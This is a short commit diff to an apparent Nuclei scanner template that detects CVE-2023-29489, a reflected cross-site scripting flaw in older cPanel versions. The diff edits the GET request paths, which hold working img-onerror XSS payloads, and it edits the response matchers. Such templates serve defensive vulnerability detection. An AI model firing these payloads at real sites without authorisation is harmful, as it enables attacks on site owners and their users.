updated req and matcher

http/cves/2023/CVE-2023-29489.yaml

@@ -1,7 +1,7 @@
 id: CVE-2023-29489
 
 info:
-  name: cPanel - Cross-Site Scripting
+  name: cPanel < 11.109.9999.116 - Cross-Site Scripting
   author: DhiyaneshDk,0xKayala
   severity: medium
   description: |
@@ -36,17 +36,15 @@ http:
   - method: GET
     path:
       - '{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaaaa'
-      - '{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa'
+      - '{{BaseURL}}/cpanelwebcall/<><img%20src=x%20onerror="prompt(document.domain)">'
-      - '{{BaseURL}}/cpanelwebcall/<><img%20src=1%20onerror=alert("XSS-POC-by-0xKayala")>'
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
           - '<img src=x onerror="prompt(document.domain)">aaaaaaaaaaaa'
-          - '<img src=x onerror="prompt(1)">aaaaaaaaaaaa'
-          - '<><img src=1 onerror=alert("XSS-POC-by-0xKayala")>'
           - 'Invalid webcall ID:'
         condition: and